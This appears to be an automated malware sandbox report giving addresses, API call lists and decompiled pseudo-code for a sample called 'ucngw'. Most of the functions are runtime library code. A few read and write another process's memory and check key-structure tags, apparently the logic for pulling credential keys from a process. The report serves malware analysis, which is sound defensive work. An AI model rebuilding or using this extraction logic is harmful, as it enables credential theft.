    0x00c5797b
    0x00c5797b
    0x00c5797b
    0x00c5797e
    0x00c5797f
    0x00000000
    0x00c57987
    0x00c577e8
    0x00c5779d
    0x00c577a2
    0x00c577a9
    0x00c577af
    0x00000000
    0x00c577af
    0x00c57777
    0x00c5777a
    0x00c57784
    0x00c57784
    0x00c57787
    0x00c5778a
    0x00000000
    0x00c5778a
    0x00c5777e
    0x00c57780
    0x00c57782
    0x00000000
    0x00000000
    0x00000000
    0x00c57782
    0x00c5772e
    0x00c57733
    0x00c5773b
    0x00000000
    0x00c576c6
    0x00c576cb
    0x00c576ce
    0x00c576d3
    0x00c57a60
    0x00000000
    0x00c57a60

    APIs
      • Part of subcall function 00C561AB: RtlAllocateHeap.NTDLL(00000000,00C51FCA,?,?,00C534C0,?,?,1FFFFFFF,?,?,00C51EFE,00C51FCA,?,?,?,?), ref: 00C561DD
      • Part of subcall function 00C56171: HeapFree.KERNEL32(00000000,00000000), ref: 00C56187
      • Part of subcall function 00C56171: GetLastError.KERNEL32(?,?,00C59953,?,00000000,?,00000000,?,00C5997A,?,00000007,?,?,00C59DDC,?,?), ref: 00C56199
    • GetConsoleMode.KERNEL32(00C547D8,?), ref: 00C57942
    • ReadConsoleW.KERNEL32(00C547D8,?,00000000,?,00000000), ref: 00C57964
    • GetLastError.KERNEL32(?,?,?,?,00000000,00001000,?,?,?,?,00C547D8,00000000), ref: 00C5796E
    • ReadFile.KERNEL32(00C547D8,?,00000000,?,00000000), ref: 00C579AC
      • Part of subcall function 00C57210: ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00C572F0
      • Part of subcall function 00C573D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00000000,?,?,00000000,00001000), ref: 00C574DD
      • Part of subcall function 00C573D0: GetLastError.KERNEL32(?,?,00000000,?,?,00000000,00001000,?,?,?,?,00000000,00001000,?), ref: 00C574E9
    • GetLastError.KERNEL32(?,?,?,?,00000000,00001000,?,?,?,?,00C547D8,00000000), ref: 00C57A10
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 00C5ABE7, Relevance: 10.7, APIs: 7, Instructions: 152file
    C-Code - Quality: 75%
    			E00C5ABE7(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t115;
				signed int _t117;
				signed char _t122;
				signed char _t127;
				intOrPtr _t128;
				signed int _t130;
				signed char* _t131;
				intOrPtr* _t132;
				signed int _t133;
				void* _t134;

				_t78 =  *0xc6a004; // 0x26d30358
				_v8 = _t78 ^ _t133;
				_t80 = _a8;
				_t117 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t131 = _a12;
				_v52 = _t131;
				_v48 = _t117;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xc6b038 + _t117 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t131;
				_t86 = GetConsoleCP();
				_t132 = _a4;
				_v60 = _t86;
				 *_t132 = 0;
				 *((intOrPtr*)(_t132 + 4)) = 0;
				 *((intOrPtr*)(_t132 + 8)) = 0;
				while(_t131 < _v40) {
					_v28 = 0;
					_v31 =  *_t131;
					_t128 =  *((intOrPtr*)(0xc6b038 + _v48 * 4));
					_t122 =  *(_t128 + _t115 + 0x2d);
					if((_t122 & 0x00000004) == 0) {
						if(( *(E00C59798(_t115, _t128) + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t131);
							goto L8;
						} else {
							if(_t131 >= _v40) {
								_t130 = _v48;
								 *((char*)( *((intOrPtr*)(0xc6b038 + _t130 * 4)) + _t115 + 0x2e)) =  *_t131;
								 *( *((intOrPtr*)(0xc6b038 + _t130 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0xc6b038 + _t130 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
							} else {
								_t112 = E00C5A97B( &_v28, _t131, 2);
								_t134 = _t134 + 0xc;
								if(_t112 != 0xffffffff) {
									_t131 =  &(_t131[1]);
									goto L9;
								}
							}
						}
					} else {
						_t127 = _t122 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
						_push(2);
						_v15 = _t127;
						 *(_t128 + _t115 + 0x2d) = _t127;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00C5A97B();
						_t134 = _t134 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t131 =  &(_t131[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t132 = GetLastError();
								} else {
									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00C51252(_t115, _v8 ^ _t133, _t131, _t132);
			}





































    0x00c5abef
    0x00c5abf6
    0x00c5abf9
    0x00c5ac01
    0x00c5ac05
    0x00c5ac11
    0x00c5ac14
    0x00c5ac17
    0x00c5ac1e
    0x00c5ac26
    0x00c5ac29
    0x00c5ac2f
    0x00c5ac35
    0x00c5ac3a
    0x00c5ac3c
    0x00c5ac3f
    0x00c5ac44
    0x00c5ac4e
    0x00c5ac55
    0x00c5ac58
    0x00c5ac5f
    0x00c5ac66
    0x00c5ac92
    0x00c5acb8
    0x00c5acba
    0x00000000
    0x00c5ac94
    0x00c5ac97
    0x00c5ad5e
    0x00c5ad6a
    0x00c5ad75
    0x00c5ad7a
    0x00c5ac9d
    0x00c5aca4
    0x00c5aca9
    0x00c5acaf
    0x00c5acb5
    0x00000000
    0x00c5acb5
    0x00c5acaf
    0x00c5ac97
    0x00c5ac68
    0x00c5ac6c
    0x00c5ac6f
    0x00c5ac75
    0x00c5ac77
    0x00c5ac7a
    0x00c5ac7e
    0x00c5acbb
    0x00c5acbe
    0x00c5acbf
    0x00c5acc4
    0x00c5acca
    0x00c5acd0
    0x00c5acdf
    0x00c5ace5
    0x00c5aceb
    0x00c5acf0
    0x00c5ad0c
    0x00c5ad7f
    0x00c5ad85
    0x00c5ad0e
    0x00c5ad16
    0x00c5ad1f
    0x00c5ad25
    0x00000000
    0x00c5ad27
    0x00c5ad29
    0x00c5ad2c
    0x00c5ad45
    0x00000000
    0x00c5ad47
    0x00c5ad4b
    0x00c5ad4d
    0x00c5ad50
    0x00000000
    0x00c5ad50
    0x00c5ad4b
    0x00c5ad45
    0x00c5ad25
    0x00c5ad1f
    0x00c5ad0c
    0x00c5acf0
    0x00c5acca
    0x00000000
    0x00c5ad53
    0x00c5ad53
    0x00c5ad87
    0x00c5ad99

    APIs
    • GetConsoleCP.KERNEL32 ref: 00C5AC29
    • __Stoull.NTSTC_LIBCMT ref: 00C5ACA4
    • __Stoull.NTSTC_LIBCMT ref: 00C5ACBF
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00C5ACE5
    • WriteFile.KERNEL32(?,?,00000000,00C5B35C,00000000), ref: 00C5AD04
    • WriteFile.KERNEL32(?,?,00000001,00C5B35C,00000000), ref: 00C5AD3D
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00C5B35C,?,00000000,?,00000000,00000000), ref: 00C5AD7F
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 1000A3D7, Relevance: 10.7, APIs: 7, Instructions: 152file
    C-Code - Quality: 73%
    			E1000A3D7(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x1001d018; // 0x26c1db24
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x1001ee60 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x1001ee60 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E10008B4D(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x1001ee60 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x1001ee60 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x1001ee60 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E10007512( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E10007512();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E10001B26(_v8 ^ _t136);
			}


































    0x1000a3df
    0x1000a3e6
    0x1000a3e9
    0x1000a3f1
    0x1000a3f5
    0x1000a401
    0x1000a404
    0x1000a407
    0x1000a40e
    0x1000a416
    0x1000a419
    0x1000a41f
    0x1000a425
    0x1000a42a
    0x1000a42c
    0x1000a42f
    0x1000a434
    0x1000a43e
    0x1000a445
    0x1000a448
    0x1000a44f
    0x1000a456
    0x1000a482
    0x1000a4a8
    0x1000a4aa
    0x00000000
    0x1000a484
    0x1000a487
    0x1000a54e
    0x1000a55a
    0x1000a565
    0x1000a56a
    0x1000a48d
    0x1000a494
    0x1000a499
    0x1000a49f
    0x1000a4a5
    0x00000000
    0x1000a4a5
    0x1000a49f
    0x1000a487
    0x1000a458
    0x1000a45c
    0x1000a45f
    0x1000a465
    0x1000a467
    0x1000a46a
    0x1000a46e
    0x1000a4ab
    0x1000a4ae
    0x1000a4af
    0x1000a4b4
    0x1000a4ba
    0x1000a4c0
    0x1000a4cf
    0x1000a4d5
    0x1000a4db
    0x1000a4e0
    0x1000a4fc
    0x1000a56f
    0x1000a575
    0x1000a4fe
    0x1000a506
    0x1000a50f
    0x1000a515
    0x00000000
    0x1000a517
    0x1000a519
    0x1000a51c
    0x1000a535
    0x00000000
    0x1000a537
    0x1000a53b
    0x1000a53d
    0x1000a540
    0x00000000
    0x1000a540
    0x1000a53b
    0x1000a535
    0x1000a515
    0x1000a50f
    0x1000a4fc
    0x1000a4e0
    0x1000a4ba
    0x00000000
    0x1000a543
    0x1000a543
    0x1000a577
    0x1000a589

    APIs
    • GetConsoleCP.KERNEL32 ref: 1000A419
    • __Stoull.NTSTC_LIBCMT ref: 1000A494
    • __Stoull.NTSTC_LIBCMT ref: 1000A4AF
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 1000A4D5
    • WriteFile.KERNEL32(?,FF8BC35D,00000000,1000AB4C,00000000), ref: 1000A4F4
    • WriteFile.KERNEL32(?,?,00000001,1000AB4C,00000000), ref: 1000A52D
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,1000AB4C,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 1000A56F
      • Part of subcall function 10001B26: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10001B6A
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 100116F0, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 114
    C-Code - Quality: 87%
    			E100116F0(void* __ecx, void* __edx, intOrPtr* _a4) {
				void* _v8;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				void* _v28;
				char _v32;
				signed int _v60;
				intOrPtr _t33;
				void* _t44;
				long _t52;
				intOrPtr* _t59;
				void* _t68;
				void** _t69;
				void* _t70;

				_t33 =  *((intOrPtr*)(__edx + 8));
				_v32 = 0;
				_v24 = 0x1001f2d0;
				_t69 = __ecx;
				_v28 = __ecx;
				if(_t33 >= 0x1f40) {
					if(_t33 >= 0x24b8) {
						_t52 = 0x3c;
						_t6 = _t52 - 8; // 0x34
						_t70 = _t6;
					} else {
						_t52 = 0x28;
						_t5 = _t52 - 8; // 0x20
						_t70 = _t5;
					}
				} else {
					_t52 = 0x20;
					_t4 = _t52 - 8; // 0x18
					_t70 = _t4;
				}
				_t68 = LocalAlloc(0x40, _t52);
				if(_t68 == 0) {
					return 0;
				} else {
					if(E10014010( &_v28, _t69, 4) != 0 && E10014010( &_v28, _t69, 4) != 0) {
						_v28 =  &_v20;
						if(E10014010( &_v28, _t69, 0x14) != 0 && _v16 == 0x55555552) {
							_v28 = _t68;
							 *_t69 = _v8;
							if(E10014010( &_v28, _t69, _t52) != 0 &&  *((intOrPtr*)(_t68 + 4)) == 0x4d53534b) {
								_t44 = LocalAlloc(0x40,  *(_t68 + _t70));
								_v28 = _t44;
								if(_t44 != 0) {
									 *_t69 = _v8 + 4 + _t70;
									if(E10014010( &_v28, _t69,  *(_t68 + _t70)) != 0) {
										_t59 = _a4;
										_v60 = 0 |  *0x1001f248( *_t59, _t59 + 4,  *((intOrPtr*)(_t59 + 8)),  *((intOrPtr*)(_t59 + 0xc)), _v28,  *(_t68 + _t70), 0) > 0x00000000;
									}
									LocalFree(_v28);
								}
							}
						}
					}
					LocalFree(_t68);
					return _v32;
				}
			}

















    0x100116f3
    0x100116f6
    0x100116fd
    0x10011708
    0x1001170a
    0x10011714
    0x10011725
    0x10011731
    0x10011736
    0x10011736
    0x10011727
    0x10011727
    0x1001172c
    0x1001172c
    0x1001172c
    0x10011716
    0x10011716
    0x1001171b
    0x1001171b
    0x1001171b
    0x10011742
    0x10011746
    0x10011853
    0x1001174c
    0x1001175e
    0x10011788
    0x10011796
    0x100117b5
    0x100117b9
    0x100117c5
    0x100117d5
    0x100117db
    0x100117e1
    0x100117f2
    0x10011801
    0x10011803
    0x10011829
    0x10011829
    0x10011831
    0x10011831
    0x100117e1
    0x100117c5
    0x10011796
    0x10011838
    0x10011849
    0x10011849

    APIs
    • LocalAlloc.KERNEL32(00000040,0000003C,C0000225,00000000,?,?), ref: 1001173C
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,10011961,1001F320,00000010), ref: 100117D5
    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,10011961,1001F320,00000010), ref: 10011831
    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,10011961,1001F320,00000010), ref: 10011838
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C5592C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38library
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C55921,00000003,?,00C558C1,00000003,00C68D08,0000000C,00C559D4,00000003,00000002), ref: 00C5594C
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,00C55921,00000003,?,00C558C1,00000003,00C68D08,0000000C,00C559D4,00000003,00000002), ref: 00C5595F
    • FreeLibrary.KERNEL32(00000000,?,?,?,00C55921,00000003,?,00C558C1,00000003,00C68D08,0000000C,00C559D4,00000003,00000002,00000000), ref: 00C55982
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 10005240, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38library
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,100051F1,?,?,10005191,?,1001B5D8,0000000C,100052C4,00000000,00000000), ref: 10005260
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,100051F1,?,?,10005191,?,1001B5D8,0000000C,100052C4,00000000,00000000), ref: 10005273
    • FreeLibrary.KERNEL32(00000000,?,?,?,100051F1,?,?,10005191,?,1001B5D8,0000000C,100052C4,00000000,00000000,00000001,100011EB), ref: 10005296
      • Part of subcall function 10001B26: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10001B6A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 100148C0, Relevance: 7.7, APIs: 5, Instructions: 226
    C-Code - Quality: 73%
    			E100148C0(signed int* __ecx, intOrPtr* __edx) {
				signed int _t86;
				intOrPtr* _t104;
				void* _t115;
				void* _t131;

				_t86 =  *__ecx;
				 *(_t131 + 0x14) = 0;
				 *((intOrPtr*)(_t131 + 0x18)) = 0x1001f2d0;
				 *(_t131 + 0xc) = 0;
				 *((intOrPtr*)(_t131 + 0x10)) = __ecx;
				 *(_t131 + 4) = 0;
				 *((intOrPtr*)(_t131 + 0x28)) = __ecx;
				_t104 = __edx;
				 *((intOrPtr*)(_t131 + 0x3c)) = __edx;
				_t115 = 1;
				if(_t86 > 3) {
					return 0xc0000002;
				} else {
					switch( *((intOrPtr*)(_t86 * 4 +  &M10014BBC))) {
						case 0:
							_push(__ecx);
							_t88 = E100145E0(__ecx, _t131 + 0x54);
							_t132 = _t131 + 4;
							if(_t88 == 0) {
								goto L32;
							} else {
								_t90 =  *((intOrPtr*)(_t132 + 0x5c));
								_t123 =  *((intOrPtr*)(_t90 + 0x14)) - 8;
								if(_t123 != _t90 + 0xc) {
									_t130 =  *((intOrPtr*)(_t132 + 0xbc));
									while(_t115 != 0) {
										 *((intOrPtr*)(_t132 + 0x34)) =  *((intOrPtr*)(_t123 + 0x18));
										 *((intOrPtr*)(_t132 + 0x3c)) =  *((intOrPtr*)(_t123 + 0x20));
										_t20 = _t123 + 0x2c; // 0x2b
										 *((intOrPtr*)(_t132 + 0x44)) = _t20;
										if(E100144D0(_t132 + 0x34, _t132 + 0x18) == 0) {
											 *(_t132 + 0x40) = 0;
										} else {
											_t110 =  *(_t132 + 0x18);
											 *((intOrPtr*)(_t132 + 0x44)) =  *((intOrPtr*)(_t110 + 8));
											LocalFree(_t110);
										}
										_push(_t130);
										_push(_t132 + 0x38);
										_t115 =  *_t104();
										_t123 =  *((intOrPtr*)(_t123 + 8)) - 8;
										if(_t123 !=  *((intOrPtr*)(_t132 + 0x5c)) + 0xc) {
											continue;
										}
										goto L10;
									}
								}
								goto L10;
							}
							goto L34;
						case 1:
							__eax = __esp + 0x2c;
							_push(__ecx);
							__edx = __esp + 0x54;
							 *(__esp + 0x48) = __eax;
							__eax = E100145E0(__ecx, __esp + 0x54);
							__esp = __esp + 4;
							if(__eax == 0) {
								goto L32;
							} else {
								__eax = __esp + 0x94;
								 *(__esp + 0x24) = __esp + 0x94;
								__edx = __esp + 0x1c;
								__eax =  *(__esp + 0x5c);
								__ecx = __esp + 0x24;
								 *(__esp + 0x20) =  *(__esp + 0x5c);
								if(E10014010(__esp + 0x24, __esp + 0x1c, 0x24) == 0) {
									goto L32;
								} else {
									__ecx =  *(__esp + 0xa8);
									__esi =  *(__esp + 0x5c);
									__ecx =  *(__esp + 0xa8) + 0xfffffff8;
									__esi =  *(__esp + 0x5c) + 0xc;
									if(__ecx == __esi) {
										L10:
										return 0;
									} else {
										__ebp =  *(__esp + 0xbc);
										while(__edi != 0) {
											__eax = __esp + 0x60;
											 *(__esp + 0x1c) = __ecx;
											__edx = __esp + 0x20;
											 *(__esp + 0x28) = __esp + 0x60;
											__ecx = __esp + 0x28;
											__edi = E10014010(__esp + 0x28, __esp + 0x20, 0x34);
											if(__edi != 0) {
												__ecx =  *(__esp + 0x8c);
												__eax =  *(__esp + 0x78);
												 *(__esp + 0x2c) = __ecx;
												 *(__esp + 0x34) =  *(__esp + 0x78);
												__eax =  *(__esp + 0x80);
												__ecx = __ecx >> 0x10;
												 *(__esp + 0x40) =  *(__esp + 0x80);
												__eax =  *(__esp + 0x94);
												 *(__esp + 0x38) =  *(__esp + 0x94);
												__eax = LocalAlloc(0x40, __ecx);
												 *(__esp + 0x30) = __eax;
												if(__eax != 0) {
													 *(__esp + 0x24) = __eax;
													__edx = __esp + 0x1c;
													__eax =  *(__esp + 0x90);
													__ecx = __esp + 0x24;
													 *(__esp + 0x1c) =  *(__esp + 0x90);
													__eax =  *(__esp + 0x2e) & 0x0000ffff;
													if(E10014010(__esp + 0x24, __esp + 0x1c,  *(__esp + 0x2e) & 0x0000ffff) != 0) {
														__ecx = __esp + 0x34;
														__eax = E100146E0(__esp + 0x34);
														_push(__ebp);
														__eax = __esp + 0x38;
														_push(__esp + 0x38);
														__edi =  *__ebx();
													}
													__eax = LocalFree( *(__esp + 0x30));
												}
											}
											__ecx =  *(__esp + 0x68);
											__ecx =  *(__esp + 0x68) + 0xfffffff8;
											if(__ecx != __esi) {
												continue;
											} else {
												__eax = 0;
												_pop(__edi);
												_pop(__esi);
												_pop(__ebp);
												_pop(__ebx);
												return 0;
											}
											goto L34;
										}
										goto L10;
									}
								}
							}
							goto L34;
						case 2:
							L32:
							goto L33;
						case 3:
							_push(__ecx);
							__edx = __esp + 0x18;
							__ecx = 0xb;
							__eax = E100147C0(0xb, __esp + 0x18);
							__esp = __esp + 4;
							 *(__esp + 0x18) = __eax;
							if(__eax < 0) {
								L33:
								return 0xc0000135;
							} else {
								__ebp =  *(__esp + 0x14);
								__ecx = __esp + 0x2c;
								__ebx = 0;
								 *(__esp + 0x44) = __esp + 0x2c;
								if( *__ebp <= 0) {
									goto L33;
								} else {
									__ecx = 0xfffffff0;
									__esi = __ebp + 0x10;
									__ecx = 0xfffffff0 - __ebp;
									 *(__esp + 0x4c) = 0xfffffff0;
									while(__edi != 0) {
										_t72 = __esi - 4; // 0x1001df80
										__eax =  *_t72;
										 *(__esp + 0x34) =  *_t72;
										__eax =  *__esi;
										 *(__esp + 0x3c) =  *__esi;
										_t75 =  &(__esi[3]); // 0xdf801001
										__eax =  *_t75 & 0x0000ffff;
										__eax = ( *_t75 & 0x0000ffff) + __ecx;
										__ecx = __ebp + 0x20;
										__ecx = __eax + __ebp + 0x20;
										__eax = E10014D30(__eax + __ebp + 0x20);
										 *(__esp + 0x14) = __eax;
										if(__eax != 0) {
											__eax = __esp + 0x30;
											RtlInitUnicodeString(__esp + 0x30, __esp + 0x30);
											_push( *(__esp + 0xbc));
											__eax = __esp + 0x38;
											 *(__esp + 0x44) = 0;
											_push(__esp + 0x38);
											__edi =  *((intOrPtr*)(__esp + 0x50))();
											__eax = LocalFree( *(__esp + 0x14));
										}
										__ecx =  *(__esp + 0x4c);
										__ebx = __ebx + 1;
										__esi =  &(__esi[0x47]);
										if(__ebx <  *__ebp) {
											continue;
										}
										break;
									}
									__eax =  *(__esp + 0x18);
									_pop(__edi);
									_pop(__esi);
									_pop(__ebp);
									_pop(__ebx);
									return __eax;
								}
							}
							goto L34;
					}
				}
				L34:
			}







    0x100148c6
    0x100148c8
    0x100148d0
    0x100148d8
    0x100148e0
    0x100148e4
    0x100148ec
    0x100148f1
    0x100148f3
    0x100148fa
    0x10014902
    0x10014bab
    0x10014908
    0x10014908
    0x00000000
    0x1001490f
    0x10014914
    0x10014919
    0x1001491e
    0x00000000
    0x10014924
    0x10014924
    0x1001492e
    0x10014933
